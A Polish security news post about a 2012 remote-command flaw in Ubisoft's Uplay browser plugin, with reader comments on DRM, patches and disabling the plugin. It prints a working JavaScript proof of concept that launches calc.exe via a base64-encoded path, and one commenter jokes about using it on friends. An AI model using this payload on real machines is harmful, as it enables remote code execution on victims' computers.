16:36
30/7/2012

Grasz w któreś z gier Ubisoftu? To masz problem…. Kontrolę nad komputerem na którym zainstalowałeś tę grę może przejąć dowolna strona internetowa.

Uplay – czy to rootkit od Ubisoftu?

Uplay to oprogramowanie wykorzystywane przez Ubisoft do weryfikacji, czy gra jest legalna (oprócz tego oferuje klika bajerów, takich jak multiplayer). Niestety, Tavis Ormandy (pracujący dla Google) właśnie odkrył, że oprogramowanie zawiera bardzo poważny błąd…

Ubisoft  Uplay

Ubisoft Uplay

Tavisa zaniepokoiło to, że podczas instalacji gry Assassin’s Creed, na jego komputerze zainstalował się plug-in do przeglądarki, który pozwala każdej stronie na dostęp do komputera. Efekt: każdy może przejąć kontrolę nad komputerem gracza (wykonać na nim dowolne polecenie). Jako przykład złośliwego kodu, Tavis pokazał jak odpalić kalkulator:


x = document.createElement('OBJECT');
x.type = "application/x-uplaypc";
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path
QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode
-uplay_dev_mode_auto_play")

$ printf "C:\\WINDOWS\\SYSTEM32\\CALC.EXE" | base64
QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ==

(Jeśli chcesz sprawdzić, czy odpali Ci się kalkulator: kliknij tutaj)

Trwają zażarte dyskusje, jak zakategoryzować tego buga? Backdoor? Rootkit? Błąd zapewnia osobom z zewnątrz kontrolę nad komputerem bez zgody i wiedzy właściciela (przypomina więc działaniem backdoora — ale czy został umieszczony celowo? Raczej był to wypadek przypracy). Czy można zatem tego przeglądarkowego plugina nazwać rootkitem? Aż tak bardzo chyba nie ukrywa swojej obecności przed użytkownikiem…

Gry Ubisoftu

Według Wikipedii, takie tytuły wypuścił Ubisoft — mamy nadzieję, że nie macie zainstalowanego żadnego z nich:

    Assassin’s Creed II
    Assassin’s Creed: Brotherhood
    Assassin’s Creed: Project Legacy
    Assassin’s Creed Revelations
    Assassin’s Creed III
    Beowulf: The Game
    Brothers in Arms: Furious 4
    Call of Juarez: The Cartel
    Driver: San Francisco
    Heroes of Might and Magic VI
    Just Dance 3
    Prince of Persia: The Forgotten Sands
    Pure Football
    R.U.S.E.
    Shaun White Skateboarding
    Silent Hunter 5: Battle of the Atlantic
    The Settlers 7: Paths to a Kingdom
    Tom Clancy’s H.A.W.X. 2
    Tom Clancy’s Ghost Recon: Future Soldier
    Tom Clancy’s Splinter Cell: Conviction
    Your Shape: Fitness Evolved

PS. Ktoś jeszcze pamięta wpadkę Sony z rootkitem (także do DRM) na każdej ich płycie CD Audio? :)


Dowiedz się, jak zabezpieczyć swoje dane i pieniądze przed cyberprzestępcami. Wpadnij na nasz kultowy ~3 godzinny wykład pt. "Jak nie dać się zhackować?" i poznaj kilkadziesiąt praktycznych i przede wszystkim prostych do zastosowania porad, które skutecznie podniosą Twoje bezpieczeństwo i pomogą ochronić przed atakami Twoich najbliższych. Uczestnicy tego wykładu oceniają go na: 9,34/10!

Na ten wykład powinien przyjść każdy, kto korzysta z internetu na smartfonie lub komputerze, prywatnie albo służbowo. Wykład prowadzimy prostym językiem, wiec zrozumie go każdy, także osoby spoza branży IT. Dlatego na wykład możesz spokojnie przyjść ze swoimi rodzicami lub mniej technicznymih znajomych. W najbliższych tygodniach będziemy w poniższych miastach:

Zobacz pełen opis wykładu klikając tutaj lub kup bilet na wykład klikając tu.

63 komentarzy

Dodaj komentarz
  1. Nie powiediałbym że to rootkit, wszak Ubi nie wsadziło go tam a by przejąć kontrolę nad chińskimi bateriami przeciwlotniczymi których pracownicy chcieli pograć sobie w AC :) Raczej źle napisany kod który w domyśle miał uruchamiać grę przez przeglądarkę.

    • jest to rootkit, jeśli infekuje jądro, by ukryć pliki – a tego nie wiem.

  2. “Kaspersky Internet Security 2012
    DOSTĘP ZABRONIONY
    Żądany adres URL nie może zostać pobrany
    URL:
    http://pastehtml.com/raw/c6gxl1a79.html
    Zablokowane przez Ochronę WWW
    Powód: adres URL zawierający phishing
    Kliknij tutaj, jeśli jesteś przekonany, że ta strona internetowa została niesłusznie zablokowana.
    Metoda wykrycia: bazy danych”

    • Co tym dziwnego?

  3. W trakcie wyboru Ghost Recon Future Soldier, 3 razy zastanawiałem się czy kupić produkt od Ubisoftu, 3 razy, bo ta firma coraz gorzej traktuje uczciwych graczy (wymogi podłączenia do internetu, limity ilości instalacji, niestabilne serwery, co jak po latach będę chciał zagrać w jakiś tytuł?) idź Pan w ch… z takim żartem, wszystko żeby obrzydzić kupowanie gier. Pomyśleć, że kusiło mnie aby u nich pracować.

    • Dlatego ja nie kupuję gier Ubisoftu. Trudno, jakoś przeżyję. Innych dobrych gier też jest dużo, a ja i tak mam mało czasu na taką rozrywkę, więc we wszystko nie zagram. Coś muszę wybrać, z czegoś zrezygnować. Rezygnuję z Ubisoftu.

    • Od czego jest TPB?

    • Towarzystwo Przyjaciół Brochowa:-)?

    • *Towarzystwo Przyjaciół Ballmera :D

  4. ciekawe czy podobna podatnosc posiada origin z plugine do przelgadarki do batllefield 3

    • Ja się zwego czasu “napaliłem” na BF3, ale Origin, i ten cały śmietnik z odpalaniem przez www (paranoja) sprawił, że skreśliłem grę, nie grałem w nią i nie zagram. Głosowanie portfelem.

  5. Skoro już mowa o Ubisoft’cie to warto też wspomnieć o spyware, które było i wciąż jest zawarte w kodzie Assassin’s Creed 1. Jest to jedyna gra z serii, która nie korzysta z Uplay. Za to zupełnie bez wiedzy użytkownika wysyłała na serwer Ubisoftu informacje o postępie w grze. Nikt by nawet nie zorientował się, że coś jest nie tak, gdyby po kilku latach Ubisoft nie wyłączył wspomnianego serwera. Od tego czasu gra zaczęła lagować. Próbuje łączyć się z serwerem, zawiesza grę na jakieś 3-4 sekundy, czeka na odpowiedź i dopiero rusza dalej. I tak co kilka minut. No i jak tu ich nie kochać?

    • >informacje o postępie w grze
      >spyware
      Poważny biznes xD

  6. Wypuszczono dziś nową wersję, która naprawiła wspomniany błąd – wtyczka do przeglądarki uruchamia jedynie aplikację Uplay.

    Cytując:
    Version 2.0.4 – Monday July 30th 2012
    * Fix addressing browser plugin. Plugin now only able to open Uplay application.

    • U mnie po aktualizacji dalej działał skrypt

  7. Mam zainstalowane ACII / B / R, odpaliłem skrypt i kalkulator się odpalił.
    Zablokuję UPlay do czasu wydania łatki.

    • I zablokowałem, zmieniłem rozszerzenie wykonywalnego i pliku biblioteki na .bin i przeniosłem do nowego folderu.

      Tym sposobem skrypt już nie działa.

    • Nie trzeba się tak bawić. Wystarczy wyłączyć wtyczkę w firefoksie.

    • A co da wyłączenie w Firefoxie jak ktoś używa innej przeglądarki…

      Trzeba raczej wyłączyć plugin w SWOJEJ PRZEGLĄDARCE.

    • Wiem że można wtyczkę dezaktywować, ale wolę być bezpieczniejszy :D

  8. Wydali zajebistą łatkę! ; ) Pomimo, że własnie zaktualizowałem do 2.0.4 o którym napisał Mikołaj – kalkulator się uruchamia. :D

    Kolejny raz zniechęcają do kupowania gier, bo bezpieczniej odpalić pirata.

  9. Travis -> Tavis

  10. Mój MAC nie może zlokalizować folderu c:\Windows
    a w te gry gram na PS3 – więc chyba będzie OK.
    Post ciekawy anyway.

    • > Mój MAC nie może zlokalizować folderu c:\Windows

      Więc wywal ten badziew i zainwestuj w coś, co potrafi. :)

    • Masz może zdjęcia swojego komputera i jego specyfikację? Jestem bardzo ciekawy tych informacji i chyba nie tylko ja, bo podaż sugeruje popyt, czyli skoro tak ciągle nawijacie o tym jaki macie komputer, to resztę muszą bardzo interesować szczegóły.

    • Linux user here…

  11. Dlatego warto jest uruchamiać wtyczki do przeglądarki na żądanie a nie standardowo włączone.

    • Dlatego warto co jakiś czas podglądnąć zainstalowane wtyczki i wyłączyć wszystkie podejrzane.

    • Dlatego za instalowanie jakichkolwiek wtyczek czy w ogóle czegokolwiek bez pytania powinno być 10 lat w kamieniołomach.

  12. Programiści świadomie bądź nie wypuścili bubel i tyle. Dla mnie uPlay to kolejny niepotrzebny dodatek do gry, przeszkadzający legalnemu nabywcy.
    Wiele osób poprostu po zakupie gry pobiera odrazu crack, aby grać “normalnie”
    Nie zawsze przecież jest dostęp do internetu.

    Próbując w ten sposób przeciwdziałać piractwu osiągają dokładnie odwrotny efekt. Bo patche potrafią pojawiać się w sieci nawet dzień po premierze.
    Ubisoft strzela sobie tym w stopy.

  13. Heroes of Might and Magic VI → Might and Magic: Heroes

    Głupia zmiana nazwy :(

  14. Wersja na Macka jest chyba wolna od tej niedogodności. A tak poza, instalator przypadkiem się nie pyta czy czegoś ekstra nie doinstalować?

    • na Macku chciałeś odpalić windowsowy kalkulator?

    • No właśnie nie pyta; wszystkie dodatkowe zbędne pierdoły zawsze wyłączam. Plugin instaluje się w tle.

    • Nie pyta. W ogóle nie ma czegoś takiego jak instalator Uplay. Po prostu podczas instalacji gry ten program instaluje się z domyślnymi ustawieniami.

    • A po co miałby się pytać. Przecież Ubisoft wie lepiej co powinno być na twoim komputerze, a czego nie powinno być.

    • @Michał, ta jasne, chciałem odpalić test napisany dla Windowsa na Macku. Wyobraź sobie, że sprawdziłem po prostu czy nie mam niechcianych wtyczek w przeglądarkach, które mam zainstalowane…

  15. Ubisoft już to naprawił.

    • Wcale nie naprawił. Po prostu zamiast kalkulatora uruchamia się Uplay. Jak są tacy mądrzy w tym ubi, to powinni założyć restrykcję, która spowoduje, że skrypt zadziała tylko na ich stronach a nie dowolnej.

  16. Dzięki za info, zara sę przetestuję na kolegach… Bua ha ha ha!
    Kolejna dziura dla gimbusów… ;-)

    • “Kolejna dziura dla gimbusów…” – to dla tego masz taki ubaw?

    • @Krzysiek Nie, miałem na myśli to, że śmiechem wybuchnę widząc komputery kolegów odpalające same z siebie kalkulatory… Chociaż może uda mi się upchnąć jakiegoś wsada do Wiersza poleceń…
      A do kodowania w base64 są łatwo dostępne programy, więc nawet gimbusy też mogą coś wsadzić (np. odpowiednio zmodyfikowana strona internetowa szkoły odpalająca pornole, niektórzy moi koledzy by się ucieszyli…)

    • Analizując twój komentarz dochodzę do wniosku że sam jesteś gimbusem który nie do końca rozumie o co chodzi a próbuje pokazać że jest inaczej. Pozdrów kolegów gimbusów.

  17. Backdoor? Rootkit? DRM? What? ;)

    Pozwoliłem sobię trochę rozleglej skomentować na swoim g+
    https://plus.google.com/106947410088462854210/posts/GDiJjPg8Wwg

    • Link nie działa. Wymaga jakiegoś logowania.

    • Nie wymaga ;)

    • @abdrgsdf
      Kliknąłeś chociaż w ten link? Czy piszesz “bo tak ci się wydaje”? :)

    • Polska strona więc mógłbyś po polsku opisać to.

  18. No super, właśnie parę dni temu na promocjach STEAM kupiłem Driver: San Francisco :)

  19. Ja mam zainstalowane tylko AC II i AC: Brotherhood :P

  20. I weź tu człowieku kup oryginalną grę :P

    • Piraty są mniej problemowe, nie potrzebują sieci, zawsze działają, mają mniej dziur… Zaczynam się zastanawiać nad zaprzestaniem kupowania gier i zaczęciem ich “pożyczania od producenta na czas przejścia”…

  21. Uff, na szczęście nie ma mojej ulubionej Dyna Blaster w wersji na Amigę :P
    A tak swoją drogą: czy nie można po prostu wyłączyć tego plugina? ;)

  22. też Anno 2070

    Można się jakoś zabezpieczyć? Odinstalować to?

  23. Mam zainstalowanego AC:Brotherhood i w żadnej z przeglądarek się nie odpala.

  24. FF (u mnie aktualnie 15 beta) automatycznie wyłącza już wtyczkę Uplay – właśnie pojawił mi się monit, że wtyczka została zgłoszona jako potencjalnie niebezpieczna i zostanie wyłączona.

  25. Ja tam pierwsze co robię po instalacji gry to szukam łaty po to by nie musieć ciągle wkładać płyty do DVD-ROM’a i słuchać jej świszczenia. Po to są teraz duże dyski by wszystko na nie zainstalować i nie bawić się w żonglowanie płytami.

  26. Origin od EA też instaluje wtyczkę do przeglądarki. dodatkowo przeglądarka staje się lancherem gry. Może ona też zawiera takie bajery. tak działa battlefield 3.

  27. Poszła informacja w świat o wpadce. Przydałoby się info o patchu: http://www.v3.co.uk/v3-uk/news/2195417/ubisoft-moves-to-patch-uplay-security-vulnerability

  28. Potwierdzam, że patch zadziałał. Mam UPlay i w tej chwili uruchomienie adresu z początku dyskusji odpala tylko Uplay (nie kalkulator)

  29. Ok Ubi przegina. Nawet w Thunderbirdzie ten addon miałem w domu….

    http://i.imgur.com/cUN02.png

  30. AVE…

    A pamięta ktoś jeszcze Spore? Pierwszą wpadkę z DRM? To była najbardziej piracona gra roku. Nie dlatego, że była zajefajna, ale po, to by ukarać w ten sposób wydawcę za zabezpieczenie, które utrudniało życie legalnemu graczowi i ograniczało jego prawa do użytkowania gry w dowolny sposób…

    Obawiam się tylko, że te zabezpieczenia nie odejdą – wydawcy chcą walczyć z rynkiem wtórnym gier. Już teraz gry konsolowej nie da się sprzedać bez sprzedawania konta z nią powiązanego. Więc jeśli ktoś kupił bubla, to kasy nie odzyska. To samo marzy się wydawcom na rynku PC. Tylko że na tym rynku o wiele łatwiej o pirata bez konieczności sprzętowej lub programowej modyfikacji. A w multi można zawsze grać po LANie…

  31. Witam, posiadam grę Call of Juraez The Cartel, jak sprawdzić czy owy dodatek zainstalował mi się, jak się nazywa? Dodam, że mam Windows 7 64b a przeglądarka to Chrome najnowszy.

Odpowiadasz na komentarz steppe

Kliknij tu, aby anulować

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: